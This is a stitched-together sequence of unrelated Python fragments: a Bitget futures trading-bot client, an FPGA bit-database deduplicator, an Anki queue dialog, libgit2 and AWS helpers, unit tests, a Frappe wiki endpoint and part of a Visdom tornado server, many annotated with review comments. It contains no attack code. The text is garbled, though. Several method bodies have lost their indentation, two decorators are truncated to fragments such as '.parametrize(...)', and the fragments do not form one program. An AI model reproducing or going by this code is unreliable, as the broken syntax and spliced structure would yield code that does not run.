params = {'symbol': (self.symbol if (symbol is None) else symbol), 'granularity': interval_map[interval][0]}
limit = 100
seconds = float(interval_map[interval][1])
if (start_time is None):
server_time = (await self.get_server_time())
params['startTime'] = int((round(float(server_time)) - ((1000 * seconds) * limit)))
else:
params['startTime'] = int(round(start_time))
params['endTime'] = int(round((params['startTime'] + ((1000 * seconds) * limit))))
fetched = (await self.public_get(self.endpoints['ohlcvs'], params))
return [{'timestamp': float(e[0]), 'open': float(e[1]), 'high': float(e[2]), 'low': float(e[3]), 'close': float(e[4]), 'volume': float(e[5])} for e in fetched]
    async def get_all_income(self, symbol: str=None, start_time: int=None, end_time: int=None):
        """Page backwards through fills and return realized-pnl income events,
        sorted oldest first, zero-pnl fills excluded.

        Defaults: end_time = now + 6h, start_time = now - 3 days.
        """
        if (end_time is None):
            end_time = (utc_ms() + (((1000 * 60) * 60) * 6))
        if (start_time is None):
            start_time = (utc_ms() - ((((1000 * 60) * 60) * 24) * 3))
        all_fills = []
        all_fills_ids = set()
        while True:
            fills = (await self.fetch_fills(symbol=symbol, start_time=start_time, end_time=end_time))
            if (not fills):
                break
            # Deduplicate across pages by fill id.
            new_fills = []
            for elm in fills:
                if (elm['id'] not in all_fills_ids):
                    new_fills.append(elm)
                    all_fills_ids.add(elm['id'])
            if (not new_fills):
                break
            # Move the window's end back to the oldest fill seen (pages backwards).
            end_time = fills[(- 1)]['timestamp']
            all_fills += new_fills
        income = [{'symbol': elm['symbol'], 'transaction_id': elm['id'], 'income': elm['realized_pnl'], 'token': self.quote, 'timestamp': elm['timestamp']} for elm in all_fills]
        return sorted([elm for elm in income if (elm['income'] != 0.0)], key=(lambda x: x['timestamp']))
    async def fetch_income(self, symbol: str=None, start_time: int=None, end_time: int=None):
        # Not supported directly; get_all_income() aggregates fills instead.
        raise NotImplementedError
    async def fetch_latest_fills_new(self):
        """Fetch recent filled orders, paging backwards up to ~3 days / 5 pages.

        Returns normalized fill dicts; [] on error.
        NOTE(review): `cached`/`fname` are loaded but never used afterwards, and
        this method near-duplicates fetch_latest_fills — looks unfinished; confirm.
        """
        cached = None
        fname = make_get_filepath(f'logs/fills_cached_bitget/{self.user}_{self.symbol}.json')
        try:
            if os.path.exists(fname):
                cached = json.load(open(fname))
            else:
                cached = []
        except Exception as e:
            # NOTE(review): logging.error with a bare extra arg doesn't format it
            # into the message; confirm intended.
            logging.error('error loading fills cache', e)
            traceback.print_exc()
            cached = []
        fetched = None
        # Look back as far as the largest configured fill delay.
        lookback_since = int((utc_ms() - max(flatten([v for (k, v) in self.xk.items() if ('delay_between_fills_ms' in k)]))))
        try:
            params = {'symbol': self.symbol, 'startTime': lookback_since, 'endTime': int((utc_ms() + (((1000 * 60) * 60) * 2))), 'pageSize': 100}
            fetched = (await self.private_get(self.endpoints['fills_detailed'], params))
            if ((fetched['code'] == '00000') and (fetched['msg'] == 'success') and (fetched['data']['orderList'] is None)):
                return []
            fetched = fetched['data']['orderList']
            # Page backwards while the oldest entry is newer than 3 days, max 5 pages.
            k = 0
            while (fetched and (float(fetched[(- 1)]['cTime']) > (utc_ms() - ((((1000 * 60) * 60) * 24) * 3)))):
                k += 1
                if (k > 5):
                    break
                params['endTime'] = int(float(fetched[(- 1)]['cTime']))
                fetched2 = (await self.private_get(self.endpoints['fills_detailed'], params))['data']['orderList']
                if (fetched2[(- 1)] == fetched[(- 1)]):
                    break
                # Merge pages, deduplicated by order id, newest first.
                fetched_d = {x['orderId']: x for x in (fetched + fetched2)}
                fetched = sorted(fetched_d.values(), key=(lambda x: float(x['cTime'])), reverse=True)
            fills = [{'order_id': elm['orderId'], 'symbol': elm['symbol'], 'status': elm['state'], 'custom_id': elm['clientOid'], 'price': float(elm['priceAvg']), 'qty': float(elm['filledQty']), 'original_qty': float(elm['size']), 'type': elm['orderType'], 'reduce_only': elm['reduceOnly'], 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched if ('filled' in elm['state'])]
        except Exception as e:
            print('error fetching latest fills', e)
            print_async_exception(fetched)
            traceback.print_exc()
            return []
        return fills
    async def fetch_latest_fills(self):
        """Fetch filled orders from the last ~6 days, paging backwards up to
        ~3 days / 5 pages; returns normalized fill dicts, [] on error."""
        fetched = None
        try:
            params = {'symbol': self.symbol, 'startTime': int((utc_ms() - ((((1000 * 60) * 60) * 24) * 6))), 'endTime': int((utc_ms() + (((1000 * 60) * 60) * 2))), 'pageSize': 100}
            fetched = (await self.private_get(self.endpoints['fills_detailed'], params))
            if ((fetched['code'] == '00000') and (fetched['msg'] == 'success') and (fetched['data']['orderList'] is None)):
                return []
            fetched = fetched['data']['orderList']
            # Page backwards while the oldest entry is newer than 3 days, max 5 pages.
            k = 0
            while (fetched and (float(fetched[(- 1)]['cTime']) > (utc_ms() - ((((1000 * 60) * 60) * 24) * 3)))):
                k += 1
                if (k > 5):
                    break
                params['endTime'] = int(float(fetched[(- 1)]['cTime']))
                fetched2 = (await self.private_get(self.endpoints['fills_detailed'], params))['data']['orderList']
                if (fetched2[(- 1)] == fetched[(- 1)]):
                    break
                # Merge pages, deduplicated by order id, newest first.
                fetched_d = {x['orderId']: x for x in (fetched + fetched2)}
                fetched = sorted(fetched_d.values(), key=(lambda x: float(x['cTime'])), reverse=True)
            fills = [{'order_id': elm['orderId'], 'symbol': elm['symbol'], 'status': elm['state'], 'custom_id': elm['clientOid'], 'price': float(elm['priceAvg']), 'qty': float(elm['filledQty']), 'original_qty': float(elm['size']), 'type': elm['orderType'], 'reduce_only': elm['reduceOnly'], 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched if ('filled' in elm['state'])]
        except Exception as e:
            print('error fetching latest fills', e)
            print_async_exception(fetched)
            traceback.print_exc()
            return []
        return fills
    async def fetch_fills(self, symbol=None, limit: int=100, from_id: int=None, start_time: int=None, end_time: int=None):
        """Fetch raw trade fills for *symbol* in [start_time, end_time], normalized.

        Defaults to the last 24h when start_time is None. Returns [] on error.
        NOTE(review): *limit* is accepted but never sent to the API — confirm.
        """
        params = {'symbol': (self.symbol if (symbol is None) else symbol)}
        if (from_id is not None):
            params['lastEndId'] = max(0, (from_id - 1))
        if (start_time is None):
            server_time = (await self.get_server_time())
            params['startTime'] = int(round((server_time - (((1000 * 60) * 60) * 24))))
        else:
            params['startTime'] = int(round(start_time))
        if (end_time is None):
            params['endTime'] = int((round((time() + ((60 * 60) * 24))) * 1000))
        else:
            params['endTime'] = int(round((end_time + 1)))
        try:
            fetched = (await self.private_get(self.endpoints['fills'], params))
            fills = [{'symbol': x['symbol'], 'id': int(x['tradeId']), 'order_id': int(x['orderId']), 'side': self.fill_side_map[x['side']], 'price': float(x['price']), 'qty': float(x['sizeQty']), 'realized_pnl': float(x['profit']), 'cost': float(x['fillAmount']), 'fee_paid': float(x['fee']), 'fee_token': self.quote, 'timestamp': int(x['cTime']), 'position_side': ('long' if ('long' in x['side']) else 'short'), 'is_maker': 'unknown'} for x in fetched['data']]
        except Exception as e:
            print('error fetching fills', e)
            traceback.print_exc()
            return []
        return fills
    async def init_exchange_config(self):
        """Best-effort setup: crossed margin mode and configured leverage.

        Errors are printed, not raised, so startup continues regardless.
        """
        try:
            res = (await self.private_post(self.endpoints['set_margin_mode'], params={'symbol': self.symbol, 'marginCoin': self.margin_coin, 'marginMode': 'crossed'}))
            print(res)
            res = (await self.private_post(self.endpoints['set_leverage'], params={'symbol': self.symbol, 'marginCoin': self.margin_coin, 'leverage': self.leverage}))
            print(res)
        except Exception as e:
            print('error initiating exchange config', e)
def standardize_market_stream_event(self, data: dict) -> [dict]:
if (('action' not in data) or (data['action'] != 'update')):
return []
ticks = []
for e in data['data']:
try:
ticks.append({'timestamp': int(e[0]), 'price': float(e[1]), 'qty': float(e[2]), 'is_buyer_maker': (e[3] == 'sell')})
except Exception as ex:
print('error in websocket tick', e, ex)
return ticks
async def beat_heart_user_stream(self) -> None:
while True:
(await asyncio.sleep(27))
try:
(await self.ws_user.send(json.dumps({'op': 'ping'})))
except Exception as e:
traceback.print_exc()
print_(['error sending heartbeat user', e])
async def beat_heart_market_stream(self) -> None:
while True:
(await asyncio.sleep(27))
try:
(await self.ws_market.send(json.dumps({'op': 'ping'})))
except Exception as e:
traceback.print_exc()
print_(['error sending heartbeat market', e])
async def subscribe_to_market_stream(self, ws):
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'instType': 'mc', 'channel': 'trade', 'instId': self.symbol_stripped}]})))
async def subscribe_to_user_streams(self, ws):
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'instType': self.product_type.upper(), 'channel': 'account', 'instId': 'default'}]})))
print(res)
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'instType': self.product_type.upper(), 'channel': 'positions', 'instId': 'default'}]})))
print(res)
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'channel': 'orders', 'instType': self.product_type.upper(), 'instId': 'default'}]})))
print(res)
async def subscribe_to_user_stream(self, ws):
if self.is_logged_into_user_stream:
(await self.subscribe_to_user_streams(ws))
else:
(await self.login_to_user_stream(ws))
async def login_to_user_stream(self, ws):
timestamp = int(time())
signature = base64.b64encode(hmac.new(self.secret.encode('utf-8'), f'{timestamp}GET/user/verify'.encode('utf-8'), digestmod='sha256').digest()).decode('utf-8')
res = (await ws.send(json.dumps({'op': 'login', 'args': [{'apiKey': self.key, 'passphrase': self.passphrase, 'timestamp': timestamp, 'sign': signature}]})))
print(res)
async def transfer(self, type_: str, amount: float, asset: str='USDT'):
return {'code': '-1', 'msg': 'Transferring funds not supported for Bitget'}
    def standardize_user_stream_event(self, event: Union[(List[Dict], Dict)]) -> Union[(List[Dict], Dict)]:
        """Translate a raw private-websocket message into the bot's internal events.

        Returns {'logged_in': True} for a login ack; otherwise a list of
        standardized event dicts (order updates, position snapshots, wallet
        balance updates). Messages for other symbols/channels yield [].
        """
        events = []
        if (('event' in event) and (event['event'] == 'login')):
            self.is_logged_into_user_stream = True
            return {'logged_in': True}
        if (('arg' in event) and ('data' in event) and ('channel' in event['arg'])):
            if (event['arg']['channel'] == 'orders'):
                for elm in event['data']:
                    # Only orders for the bot's own symbol are relevant.
                    if ((elm['instId'] == self.symbol) and ('status' in elm)):
                        standardized = {}
                        if (elm['status'] == 'cancelled'):
                            standardized['deleted_order_id'] = elm['ordId']
                        elif (elm['status'] == 'new'):
                            standardized['new_open_order'] = {'order_id': elm['ordId'], 'symbol': elm['instId'], 'price': float(elm['px']), 'qty': float(elm['sz']), 'type': elm['ordType'], 'side': elm['side'], 'position_side': elm['posSide'], 'timestamp': elm['uTime']}
                        elif (elm['status'] == 'partial-fill'):
                            # Partial fills are reported as a delete plus a flag;
                            # the consumer is expected to refresh open orders.
                            standardized['deleted_order_id'] = elm['ordId']
                            standardized['partially_filled'] = True
                        elif (elm['status'] == 'full-fill'):
                            standardized['deleted_order_id'] = elm['ordId']
                            standardized['filled'] = True
                        events.append(standardized)
            if (event['arg']['channel'] == 'positions'):
                # Both sides default to flat; a snapshot lacking one side means
                # that side is closed, and both dicts are always emitted.
                long_pos = {'psize_long': 0.0, 'pprice_long': 0.0}
                short_pos = {'psize_short': 0.0, 'pprice_short': 0.0}
                for elm in event['data']:
                    if ((elm['instId'] == self.symbol) and ('averageOpenPrice' in elm)):
                        if (elm['holdSide'] == 'long'):
                            long_pos['psize_long'] = round_(abs(float(elm['total'])), self.qty_step)
                            long_pos['pprice_long'] = truncate_float(elm['averageOpenPrice'], self.price_rounding)
                        elif (elm['holdSide'] == 'short'):
                            # Short position sizes are stored negative by convention.
                            short_pos['psize_short'] = (- abs(round_(abs(float(elm['total'])), self.qty_step)))
                            short_pos['pprice_short'] = truncate_float(elm['averageOpenPrice'], self.price_rounding)
                events.append(long_pos)
                events.append(short_pos)
            if (event['arg']['channel'] == 'account'):
                for elm in event['data']:
                    # Only the quote-currency balance matters for the bot.
                    if (elm['marginCoin'] == self.quote):
                        events.append({'wallet_balance': float(elm['available'])})
        return events
def remove_ambiguous_solutions(fn_in, db_lines, strict=True, verbose=True):
    """Drop db lines whose bit set is shared by more than one feature.

    Each line is '<feature> <bit> <bit> ...'. If the same frozenset of bits
    appears under two different features the solution is ambiguous.

    Args:
        fn_in: input file name, used only in the warning summary.
        db_lines: iterable of db line strings.
        strict: if True, assert on any duplicate and return (0, db_lines)
            unchanged; if False, remove all lines carrying a duplicated
            solution.
        verbose: print a warning per dropped line.

    Returns:
        (drops, lines): number of lines dropped and the surviving lines
        (the original list when strict, otherwise a set).
    """
    solutions = {}
    dropped_solutions = set()
    for line in db_lines:
        parts = line.split()
        feature = parts[0]
        bits = frozenset(parts[1:])
        if bits in solutions:
            if strict:
                assert False, 'Found solution {} at least twice, in {} and {}'.format(bits, feature, solutions[bits])
            else:
                dropped_solutions.add(bits)
        else:
            solutions[bits] = feature
    if strict:
        return (0, db_lines)
    drops = 0
    output_lines = set()
    for line in db_lines:
        bits = frozenset(line.split()[1:])
        # BUG FIX: previously `drops` was incremented for *kept* lines (the
        # branch was inverted), so the count and summary reported the number
        # of surviving lines instead of the number of dropped ones.
        if bits in dropped_solutions:
            drops += 1
            if verbose:
                print('WARNING: dropping line due to duplicate solution: %s' % line)
        else:
            output_lines.add(line)
    if drops > 0:
        print('WARNING: %s dropped %s duplicate solutions' % (fn_in, drops))
    return (drops, output_lines)
class QueuePicker(QDialog):
    """Maximized dialog for managing the reading queue and schedules.

    Icon paths are cached at class level on first instantiation so the
    night-mode variant is resolved only once per session.
    """
    # Class-level icon path cache, populated lazily in __init__.
    icons_path = None
    vline_icn = None
    branch_more_icn = None
    branch_end_icn = None
    branch_closed_icn = None
    branch_open_icn = None
    def __init__(self, parent):
        QDialog.__init__(self, parent, (((Qt.WindowType.WindowSystemMenuHint | Qt.WindowType.WindowTitleHint) | Qt.WindowType.WindowMaximizeButtonHint) | Qt.WindowType.WindowCloseButtonHint))
        self.mw = aqt.mw
        self.parent = parent
        # First instantiation resolves the icon variants for the current theme.
        if (QueuePicker.icons_path is None):
            QueuePicker.icons_path = (utility.misc.get_web_folder_path() + 'icons/')
            QueuePicker.vline_icn = (QueuePicker.icons_path + ('vline-night' if state.is_nightmode() else 'vline'))
            QueuePicker.branch_more_icn = (QueuePicker.icons_path + ('branch-more-night' if state.is_nightmode() else 'branch-more'))
            QueuePicker.branch_end_icn = (QueuePicker.icons_path + ('branch-end-night' if state.is_nightmode() else 'branch-end'))
            QueuePicker.branch_closed_icn = (QueuePicker.icons_path + ('branch-closed-night' if state.is_nightmode() else 'branch-closed'))
            QueuePicker.branch_open_icn = (QueuePicker.icons_path + ('branch-open-night' if state.is_nightmode() else 'branch-open'))
        try:
            self.dark_mode_used = state.is_nightmode()
        except:
            # NOTE(review): bare except silently falls back to light mode;
            # consider narrowing to the exception actually expected here.
            self.dark_mode_used = False
        self.setup_ui()
        self.setWindowTitle('Queue Manager')
        self.showMaximized()
    def setup_ui(self):
        """Build the combo-box mode selector plus the two stacked widgets
        (queue / schedules); only one is visible at a time."""
        self.setLayout(QVBoxLayout())
        self.mode_sel = QComboBox()
        self.mode_sel.addItem('Queue', QVariant(1))
        self.mode_sel.addItem('Schedules', QVariant(2))
        self.mode_sel.currentIndexChanged.connect(self.mode_change)
        self.layout().addWidget(self.mode_sel)
        self.layout().setAlignment(Qt.AlignmentFlag.AlignTop)
        self.queue_widget = QueueWidget(self)
        self.sched_widget = ScheduleMWidget(self)
        # Queue view is the default; schedules start hidden.
        self.sched_widget.setVisible(False)
        self.layout().addWidget(self.queue_widget)
        self.layout().addWidget(self.sched_widget)
    def chosen_id(self):
        """Return the id picked in the queue widget (None until a choice is made)."""
        return self.queue_widget.chosen_id
    def mode_change(self, ix):
        """Swap visibility between queue (index 0) and schedules (index 1)."""
        if (ix == 0):
            self.sched_widget.setVisible(False)
            self.queue_widget.setVisible(True)
        else:
            self.queue_widget.setVisible(False)
            self.sched_widget.setVisible(True)
            # Refresh schedule data each time that view is entered.
            self.sched_widget.refresh()
class Structure(_Struct_Union_Base):
    """In-memory description of a parsed C struct: name, alignment, members,
    base classes, optional size, and whether it is compiler-artificial."""

    def __init__(self, name, align, members, bases, size, artificial=None):
        self.name = name
        self.align = int(align)
        self.members = members
        self.bases = bases
        self.artificial = artificial
        # Size may be unknown (e.g. an incomplete/forward declaration).
        self.size = int(size) if size is not None else None
        super(Structure, self).__init__()
def generate_system_aws(file_name: str, include_null: bool, organization_key: str, aws_config: Optional[AWSConfig], url: AnyHttpUrl, headers: Dict[(str, str)]) -> str:
    """Scan AWS for systems under the given organization and write them to a
    manifest file. Returns the manifest file name for chaining."""
    organization = get_organization(organization_key=organization_key, manifest_organizations=[], url=url, headers=headers)
    # The server must know the organization before systems can be attributed to it.
    assert organization
    discovered_systems = generate_aws_systems(organization, aws_config=aws_config)
    write_system_manifest(file_name=file_name, include_null=include_null, systems=discovered_systems)
    return file_name
def is_already_running(look_for='Music Caster', threshold=1, pid=None) -> bool:
    """Return True if more than `threshold` matching processes are running.

    On Windows, iterates get_running_processes (pid is forwarded there).
    Elsewhere, shells out to `ps -C` and only checks whether any match exists
    (threshold and pid are ignored on that path — preserved behavior).
    """
    if platform.system() == 'Windows':
        for _ in get_running_processes(look_for=look_for, pid=pid):
            threshold -= 1
            if threshold < 0:
                return True
    else:
        # BUG FIX: the Popen object and its pipes were never closed, leaking
        # file descriptors (and a zombie) on every call; the context manager
        # waits for the child and closes all pipes.
        with Popen(['ps', 'h', '-C', look_for, '-o', 'comm'],
                   stdout=PIPE, stdin=PIPE, stderr=DEVNULL, text=True) as p:
            return p.stdout.readline().strip() != ''
    return False
def init_repository(path, bare=False, flags=C.GIT_REPOSITORY_INIT_MKPATH, mode=0, workdir_path=None, description=None, template_path=None, initial_head=None, origin_url=None):
    """Create a new git repository at *path* via libgit2's extended init.

    Optional arguments map 1:1 onto git_repository_init_options fields.
    Returns a Repository opened on the new path.
    """
    if bare:
        flags |= C.GIT_REPOSITORY_INIT_BARE
    options = ffi.new('git_repository_init_options *')
    C.git_repository_init_init_options(options, C.GIT_REPOSITORY_INIT_OPTIONS_VERSION)
    options.flags = flags
    options.mode = mode
    # NOTE: each *_ref local below must stay alive until git_repository_init_ext
    # runs — cffi does not keep owners of buffers assigned to struct fields, so
    # dropping these locals would let the char[] buffers be collected early.
    if workdir_path:
        workdir_path_ref = ffi.new('char []', to_bytes(workdir_path))
        options.workdir_path = workdir_path_ref
    if description:
        description_ref = ffi.new('char []', to_bytes(description))
        options.description = description_ref
    if template_path:
        template_path_ref = ffi.new('char []', to_bytes(template_path))
        options.template_path = template_path_ref
    if initial_head:
        initial_head_ref = ffi.new('char []', to_bytes(initial_head))
        options.initial_head = initial_head_ref
    if origin_url:
        origin_url_ref = ffi.new('char []', to_bytes(origin_url))
        options.origin_url = origin_url_ref
    crepository = ffi.new('git_repository **')
    err = C.git_repository_init_ext(crepository, to_bytes(path), options)
    # Raises a GitError-style exception on non-zero return codes.
    check_error(err)
    return Repository(to_str(path))
def test_repr_in_container():
    """repr() of a provider accessed through its container must include the
    container-qualified name ('Container.dependency')."""
    class Container(containers.DeclarativeContainer):
        dependency = providers.Dependency(instance_of=int)

    container = Container()
    provider = container.dependency
    expected = '<dependency_injector.providers.Dependency({0}) at {1}, container name: "Container.dependency">'.format(repr(int), hex(id(provider)))
    assert repr(provider) == expected
# NOTE(review): the '.parametrize(...)' line below looks like a decorator that
# lost its '@pytest.mark' prefix during extraction — confirm against the
# original file before running.
.parametrize('literal_type', LIST_OF_ALL_LITERAL_TYPES)
def test_variable_type(literal_type):
    """A Variable keeps its type and description, and survives a flyte-IDL round trip."""
    var = interface.Variable(type=literal_type, description='abc')
    assert (var.type == literal_type)
    assert (var.description == 'abc')
    # Round-trip through protobuf must be lossless.
    assert (var == interface.Variable.from_flyte_idl(var.to_flyte_idl()))
# NOTE(review): the '(allow_guest=True)' line below looks like a decorator that
# lost its '@frappe.whitelist' prefix during extraction — confirm.
(allow_guest=True)
def get_revisions(wiki_page_name):
    """Return all revisions of a wiki page, newest metadata resolved for display.

    Each revision gets a pretty-printed time, a resolved author, and its
    markdown content rendered to HTML; raw attribution/creation fields are
    stripped before returning.
    """
    revisions = frappe.db.get_all('Wiki Page Revision', {'wiki_page': wiki_page_name}, ['content', 'creation', 'owner', 'raised_by', 'raised_by_username'])
    for revision in revisions:
        revision.revision_time = pretty_date(revision.creation)
        # Prefer the display username, then the raising user, then the record owner.
        revision.author = (revision.raised_by_username or revision.raised_by or revision.owner)
        revision.content = md_to_html(revision.content)
        # Remove raw fields now folded into revision_time/author.
        del revision.raised_by_username
        del revision.raised_by
        del revision.creation
        del revision.owner
    return revisions
def fake_client(owned_manifest_path):
    """Return a stub IPFS client for tests.

    `cat` echoes the hash back; `add` returns a canned successful result only
    for the owned manifest path (anything else yields None implicitly).
    """

    class FakeClient:
        def cat(self, ipfs_hash):
            # Echo instead of fetching content from IPFS.
            return ipfs_hash

        def add(self, file_or_dir_path, recursive):
            if Path(file_or_dir_path) == owned_manifest_path:
                return {'Hash': 'QmbeVyFLSuEUxiXKwSsEjef6icpdTdA4kGG9BcrJXKNKUW', 'Name': '1.0.0.json', 'Size': '454'}

    return FakeClient()
class _Select(BuiltIn):
    """Built-in select(x, v, y, z): yields y when x < v, otherwise z."""

    def __init__(self):
        super().__init__('select')

    def typecheck(self, args):
        """Require exactly four real scalar arguments; return the result type.

        The result type is taken from the last argument, matching the
        previous behavior.
        """
        if (len(args) != 4):
            raise _BErr(f'expected 4 arguments, got {len(args)}')
        # Previously four copy-pasted checks; identical messages, one loop.
        for position, arg in enumerate(args, start=1):
            atyp = arg.type
            if (not atyp.is_real_scalar()):
                raise _BErr(f'expected argument {position} to be a real scalar value, but got type {atyp}')
        return args[3].type

    def globl(self):
        """Return the C helper emitted once into generated source."""
        s = 'double _select_(double x, double v, double y, double z) {\n  if (x < v) return y;\n  else return z;\n}\n'
        return s

    def interpret(self, args):
        """Python-side evaluation of select(x, v, y, z)."""
        x, v, y, z = args[0], args[1], args[2], args[3]
        return y if (x < v) else z

    def compile(self, args):
        """Emit the C call expression for compiled evaluation."""
        return f'_select_((double)*{args[0]}, (double)*{args[1]}, (double)*{args[2]}, (double)*{args[3]})'
class ItemTest(QuickbooksTestCase):
    """Integration test for Item creation against the QuickBooks sandbox."""

    def setUp(self):
        super(ItemTest, self).setUp()
        # Timestamp-derived suffix keeps generated names unique across runs.
        self.account_number = datetime.now().strftime('%d%H%M')
        self.name = 'Test Item {0}'.format(self.account_number)
        # One existing account of each kind required to create an inventory item.
        self.income_account = Account.where("AccountType = 'Income' and AccountSubType = 'SalesOfProductIncome'", max_results=1, qb=self.qb_client)[0]
        self.expense_account = Account.where("AccountSubType = 'SuppliesMaterialsCogs'", max_results=1, qb=self.qb_client)[0]
        self.asset_account = Account.where("AccountSubType = 'Inventory'", max_results=1, qb=self.qb_client)[0]

    def test_create(self):
        """Create an inventory item, re-fetch it, and verify every field round-trips."""
        item = Item()
        item.Name = self.name
        item.Type = 'Inventory'
        item.TrackQtyOnHand = True
        item.QtyOnHand = 10
        item.Sku = 'SKU123123'
        item.InvStartDate = '2015-01-01'
        item.IncomeAccountRef = self.income_account.to_ref()
        item.ExpenseAccountRef = self.expense_account.to_ref()
        item.AssetAccountRef = self.asset_account.to_ref()
        item.save(qb=self.qb_client)
        fetched = Item.get(item.Id, qb=self.qb_client)
        self.assertEqual(fetched.Id, item.Id)
        # Scalar fields must round-trip unchanged.
        for attr, expected in (('Name', self.name), ('Type', 'Inventory'), ('Sku', 'SKU123123'), ('TrackQtyOnHand', True), ('QtyOnHand', 10)):
            self.assertEqual(getattr(fetched, attr), expected)
        # Account references must point at the accounts picked in setUp.
        self.assertEqual(fetched.IncomeAccountRef.value, self.income_account.Id)
        self.assertEqual(fetched.ExpenseAccountRef.value, self.expense_account.Id)
        self.assertEqual(fetched.AssetAccountRef.value, self.asset_account.Id)
def extractTinypandaSpace(item):
    """Parse a Tinypanda Space feed item into a release message.

    Returns None for preview posts or items with no chapter/volume info,
    a release message for recognized groups, or False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    release_groups = (('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel'))
    for tag, group_name, tl_type in release_groups:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, group_name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def get_line_prefix(pre_lines: list[str], curr_line: str, col: int, qs: bool=True) -> str:
    """Return the lower-cased text preceding column *col*, with continuation
    lines prepended.

    Returns None when the line is missing, the column is past the end, the
    line is a comment, or (when *qs* is true) the cursor sits inside an open
    single- or double-quoted string.
    """
    if curr_line is None or col > len(curr_line) or curr_line.startswith('#'):
        return None
    prepended = ''.join(pre_lines)
    line_prefix = (prepended + curr_line)[:col + len(prepended)].lower()
    if qs and ("'" in line_prefix or '"' in line_prefix):
        # Count quotes of each kind, ignoring those nested inside an open
        # string of the other kind; an odd count means an unterminated string.
        single = double = 0
        for ch in line_prefix:
            if ch == "'" and double % 2 == 0:
                single += 1
            elif ch == '"' and single % 2 == 0:
                double += 1
        if double % 2 == 1 or single % 2 == 1:
            return None
    return line_prefix
class Application(tornado.web.Application):
    """Visdom tornado server application.

    Owns the environment state, saved layouts, user settings, and the sets of
    connected subscribers/sources, and registers every HTTP and websocket
    handler under `base_url`.
    """
    def __init__(self, port=DEFAULT_PORT, base_url='', env_path=DEFAULT_ENV_PATH, readonly=False, user_credential=None, use_frontend_client_polling=False, eager_data_loading=False):
        # When False, env jsons are wrapped lazily (LazyEnvData) instead of
        # being parsed up front in load_state().
        self.eager_data_loading = eager_data_loading
        self.env_path = env_path
        self.state = self.load_state()
        self.layouts = self.load_layouts()
        self.user_settings = self.load_user_settings()
        self.subs = {}
        self.sources = {}
        self.port = port
        self.base_url = base_url
        self.readonly = readonly
        self.user_credential = user_credential
        self.login_enabled = False
        self.last_access = time.time()
        self.wrap_socket = use_frontend_client_polling
        if user_credential:
            self.login_enabled = True
            # NOTE(review): the cookie secret is read from DEFAULT_ENV_PATH even
            # when a custom env_path was passed — confirm this is intended.
            with open((DEFAULT_ENV_PATH + 'COOKIE_SECRET'), 'r') as fn:
                tornado_settings['cookie_secret'] = fn.read()
        tornado_settings['static_url_prefix'] = (self.base_url + '/static/')
        tornado_settings['debug'] = True
        # Order matters: the catch-all IndexHandler route must come last.
        handlers = [(('%s/events' % self.base_url), PostHandler, {'app': self}), (('%s/update' % self.base_url), UpdateHandler, {'app': self}), (('%s/close' % self.base_url), CloseHandler, {'app': self}), (('%s/socket' % self.base_url), SocketHandler, {'app': self}), (('%s/socket_wrap' % self.base_url), SocketWrap, {'app': self}), (('%s/vis_socket' % self.base_url), VisSocketHandler, {'app': self}), (('%s/vis_socket_wrap' % self.base_url), VisSocketWrap, {'app': self}), (('%s/env/(.*)' % self.base_url), EnvHandler, {'app': self}), (('%s/compare/(.*)' % self.base_url), CompareHandler, {'app': self}), (('%s/save' % self.base_url), SaveHandler, {'app': self}), (('%s/error/(.*)' % self.base_url), ErrorHandler, {'app': self}), (('%s/win_exists' % self.base_url), ExistsHandler, {'app': self}), (('%s/win_data' % self.base_url), DataHandler, {'app': self}), (('%s/delete_env' % self.base_url), DeleteEnvHandler, {'app': self}), (('%s/env_state' % self.base_url), EnvStateHandler, {'app': self}), (('%s/fork_env' % self.base_url), ForkEnvHandler, {'app': self}), (('%s/user/(.*)' % self.base_url), UserSettingsHandler, {'app': self}), (('%s(.*)' % self.base_url), IndexHandler, {'app': self})]
        super(Application, self).__init__(handlers, **tornado_settings)
    def get_last_access(self):
        """Return the last-activity timestamp, refreshed while clients are connected."""
        if ((len(self.subs) > 0) or (len(self.sources) > 0)):
            self.last_access = time.time()
        return self.last_access
    def save_layouts(self):
        """Persist the current layout string to <env_path>/view; no-op when env_path is None."""
        if (self.env_path is None):
            warn_once('Saving and loading to disk has no effect when running with env_path=None.', RuntimeWarning)
            return
        layout_filepath = os.path.join(self.env_path, 'view', LAYOUT_FILE)
        with open(layout_filepath, 'w') as fn:
            fn.write(self.layouts)
    def load_layouts(self):
        """Read the layout string from disk, creating the view dir if missing."""
        if (self.env_path is None):
            warn_once('Saving and loading to disk has no effect when running with env_path=None.', RuntimeWarning)
            return ''
        layout_dir = os.path.join(self.env_path, 'view')
        layout_filepath = os.path.join(layout_dir, LAYOUT_FILE)
        if os.path.isfile(layout_filepath):
            with open(layout_filepath, 'r') as fn:
                return fn.read()
        else:
            ensure_dir_exists(layout_dir)
            return ''
    def load_state(self):
        """Load all env jsons from env_path into the state dict.

        With eager_data_loading each json is parsed immediately (bad files are
        logged and skipped); otherwise envs are wrapped in LazyEnvData. A
        'main' env is always present and serialized if it was missing.
        """
        state = {}
        env_path = self.env_path
        if (env_path is None):
            warn_once('Saving and loading to disk has no effect when running with env_path=None.', RuntimeWarning)
            return {'main': {'jsons': {}, 'reload': {}}}
        ensure_dir_exists(env_path)
        env_jsons = [i for i in os.listdir(env_path) if ('.json' in i)]
        for env_json in env_jsons:
            eid = env_json.replace('.json', '')
            env_path_file = os.path.join(env_path, env_json)
            if self.eager_data_loading:
                try:
                    with open(env_path_file, 'r') as fn:
                        env_data = tornado.escape.json_decode(fn.read())
                except Exception as e:
                    logging.warn('Failed loading environment json: {} - {}'.format(env_path_file, repr(e)))
                    continue
                state[eid] = {'jsons': env_data['jsons'], 'reload': env_data['reload']}
            else:
                state[eid] = LazyEnvData(env_path_file)
